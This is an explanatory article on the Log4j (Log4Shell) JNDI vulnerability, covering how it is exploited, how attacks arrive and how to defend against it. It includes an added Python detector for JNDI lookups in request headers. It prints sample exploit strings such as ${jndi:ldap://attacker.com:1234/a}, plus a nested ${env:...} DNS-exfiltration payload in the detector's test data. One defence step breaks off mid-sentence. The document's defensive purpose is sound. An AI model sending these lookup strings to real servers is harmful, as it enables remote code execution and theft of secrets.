Log4j Vulnerability: The Impact, Exploitation, Attack Vectors, and Defence Mechanisms

Joseph Ikhalia

Riela Cyber Security Engineer & Threat Management Lead

What is the Log4j vulnerability?

  • Log4j is a Java library extremely popular with Java developers and it is used for logging application events. The vulnerability was introduced in version 2.0-beta9 of the Log4j Java library.
  • The introduction of a new Plugin – JNDI Lookups to the Log4j library created the security vulnerability.
  • JNDI (Java Naming and Directory Interface) Lookup Plugin is a data enrichment Plugin that allows developers to enrich the data being logged by Log4j library.
  • JNDI is a mechanism (API) that allows Java programs to perform lookups to objects.
  • JNDI supports several other protocols which include LDAP (Lightweight Directory Access Protocol), RMI (remote method invocation), DNS (Domain Name System), and CORBA (Common Object Request Broker Architecture).
  • The Log4j vulnerability is an input validation flaw: the library parses Lookups found in any input it receives, through whichever channel that input reaches it.
  • Although most of the attacks today affect web applications, any Lookup that ends up in a vulnerable log4j library can potentially be used as an exploit.
  • Log4j library treats user input as some form of a format string.
  • It looks for a Lookup in any input that starts with characters ${jndi:[Specify the Protocol to be Used] e.g., ${jndi:ldap://attacker.com:1234/a} or ${jndi:rmi://attacker.com:9191/a}.
  • Log4j will attempt to parse the above Lookup and if successful – it will perform a Lookup action to enrich the data that is being logged into a log.
  • The issue here is that a remote code execution attack is possible when using JNDI and LDAP.
  • LDAP allows the storage of serialized Java objects. When a Java application fetches an LDAP entry and finds an object it must execute in order to populate the data, it executes that code without question. This leads to remote code execution, and exploitation is easy.

How Log4j Vulnerability is Exploited

  • An attacker must submit a Lookup that points to a server they control, for example the following Lookups, which use the LDAP and RMI protocols respectively:

${jndi:ldap://attacker.com:1234/a}

${jndi:rmi://attacker.com:9191/a}

  • When an application using a vulnerable Log4j library encounters one of the above Lookup strings, it parses it by first contacting an LDAP server running on attacker.com on TCP port 1234 and tries to fetch an object that tells it how to resolve the Lookup.
  • When the attacker receives the LDAP request, they can:
      • serve a Java serialized object back immediately, or
      • serve back a reference that makes the vulnerable library contact an arbitrary server to fetch a malicious object and execute it.
  • Most of the exploits seen today use the LDAP protocol.
  • An attacker can use hostnames, in which case the resolver will automatically try to resolve those DNS names and this can be used for exfiltration of very sensitive data. For example, an attacker can embed an environment variable from the target server into the hostname and this will end up leaking the variable to the attacker if the attacker controls the DNS zone that was used in the attack.

Log4j Attack Vectors

  • Basically, any user-supplied input that is parsed by Log4j is a potential attack vector.
  • Currently, bots are blindly attacking web pages, sending JNDI exploit strings in various request headers.

[Screenshot: bot requests carrying JNDI exploit strings in request headers]

  • Exploitation via the attack vector in the screenshot above only catches the low-hanging fruit.
  • Even if a web application is protected by a login form, any parameter that gets passed to Log4j is a potential input vector.
  • Keep in mind that if you scan your IT estate and do not find any vulnerable application, it doesn’t mean you are completely safe because remote checks are quite limited.
  • As seen in the case of Minecraft, Log4j can be exploited on the client and server-side of the application.
  • If you have a client application that contains a vulnerable Log4j library, and a malicious server sends data to the client library, the client can be exploited as well. Unfortunately, this implies that it will take an awfully long time to fix the Log4j vulnerability everywhere.

Requirements for an Attacker to Exploit Log4j Vulnerability

  • An attacker must be able to deliver malicious input that is processed by a vulnerable Log4j library (currently versions 2.0-beta9 to 2.14 are vulnerable, while version 2.15 is not).
  • Most current exploits require that the server running the affected application connects back to the attacker's server, or to another server under the attacker's control. This is needed for the attacker to push back the Java serialized object that the vulnerable Java code will execute.

Defence Mechanism Against Log4j Exploits

  • If you prevent your servers from connecting directly to the internet, you limit the exposure to Log4j exploitation. This is not a silver bullet, though: particularly if the victim is running Apache Tomcat or WebSphere, there are ways to exploit the Log4j vulnerability without the server running the vulnerable library connecting back to the attacker. However, such exploits haven't been seen in the wild yet.
  • Apply appropriate firewall rules so that application servers only make remote calls to the systems they are allowed to talk to. This increases the attacker's effort dramatically and reduces the potential risk.
  • Follow vendor guidance to apply the latest patch on affected systems. Ideally, patches should be applied to development environments first to avoid production outages.
  • If you cannot patch – disable remote
  • Depending on the Java version, some attacks could be more difficult than others.
  • Use the IMMA technique:
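
The header-scanning check described above, as an added example that is not part of the original article: it pulls every ${jndi:...} Lookup out of logged request headers, records which protocol and host the server would have called back to, and flags a hostname that itself carries a nested lookup, the exfiltration pattern described earlier. The header lines, hostnames, ports and variable name are constructed placeholders.

```python
from dataclasses import dataclass
from typing import Optional

LOOKUP_START = "${jndi:"

# Constructed sample of request-header lines as a web server might log them.
# Hostnames, ports and the variable name are placeholders, not real indicators.
# ${env:...} is Log4j's documented environment lookup; it appears here only so
# the detector sees the nested form the text describes.
SAMPLE_HEADERS = [
    "User-Agent: ${jndi:ldap://attacker.example:1234/a}",
    "X-Forwarded-For: ${jndi:rmi://attacker.example:9191/a}",
    "Referer: ${jndi:dns://${env:EXAMPLE_VAR}.attacker.example/a}",
    "User-Agent: Mozilla/5.0 (compatible; ordinary browser)",
]

@dataclass
class Finding:
    header: str            # which request header carried the lookup
    scheme: str            # ldap, rmi, dns, ...
    host: str              # where the server would connect back to
    port: Optional[str]
    nested_lookup: bool    # host contains ${...}: possible exfiltration via DNS

def extract_jndi_lookups(text: str) -> list:
    """Return each ${jndi:...} lookup in text, keeping nested ${...} intact."""
    found, i = [], text.find(LOOKUP_START)
    while i != -1:
        depth, end = 0, -1
        for j in range(i, len(text)):      # brace-match so nesting is preserved
            if text.startswith("${", j):
                depth += 1
            elif text[j] == "}":
                depth -= 1
                if depth == 0:
                    end = j
                    break
        if end == -1:
            break                          # unterminated lookup: nothing to match
        found.append(text[i:end + 1])
        i = text.find(LOOKUP_START, end + 1)
    return found

def analyse_header(line: str) -> list:
    """Parse one 'Name: value' header line into Findings (empty if clean)."""
    name, _, value = line.partition(":")
    findings = []
    for lookup in extract_jndi_lookups(value):
        body = lookup[len(LOOKUP_START):-1]          # scheme://authority/path
        scheme, sep, rest = body.partition("://")
        authority = rest.split("/", 1)[0] if sep else ""
        host, port = authority, None
        # a nested ${env:...} also contains ':', so only a trailing all-digit
        # segment counts as the port
        head, colon, tail = authority.rpartition(":")
        if colon and tail.isdigit():
            host, port = head, tail
        findings.append(Finding(name.strip(), scheme.lower(), host, port, "${" in host))
    return findings

def scan(lines) -> list:
    """Findings for every line; feed the hosts to egress blocking and alerting."""
    return [f for line in lines for f in analyse_header(line)]

if __name__ == "__main__":
    for f in scan(SAMPLE_HEADERS):
        print(f"{f.header}: {f.scheme} -> {f.host}:{f.port} nested={f.nested_lookup}")
```
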

Isolate – your application servers with a Firewall.

Minimize – run applications under a least-privilege account.

Monitor – watch for strange network activity.

Active Defense – deploy honeypots to find exploitation reconnaissance and deploy honey data near suspected vulnerable apps.

  • Attackers always leave a footprint; make sure you monitor all hosts and networks for the following IoCs:

Hosts

  • CPU spike
  • Unauthorised configuration changes
  • Disparate logs & commands needed

Network

  • Unexpected connections – AKA a new host
  • Unexpected volume – do “top talker” analysis
  • Long connections – persistent access? Slow exfil?